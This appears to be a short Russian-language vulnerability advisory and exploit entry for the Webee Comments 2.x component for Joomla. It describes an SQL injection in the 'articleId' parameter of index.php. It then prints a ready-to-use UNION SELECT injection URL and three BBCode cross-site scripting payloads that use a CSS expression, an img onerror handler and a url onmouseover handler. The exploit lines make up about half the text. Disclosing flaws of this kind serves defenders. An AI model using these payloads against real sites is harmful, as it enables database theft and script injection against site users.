Программа: Webee Comments 2.x (component for Joomla)
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "articleId" сценарием index.php (когда "option"
установлен в "com_webeecomment"). Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
index2.php?option=com_webeecomment&task=default& articleId=999 union
select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
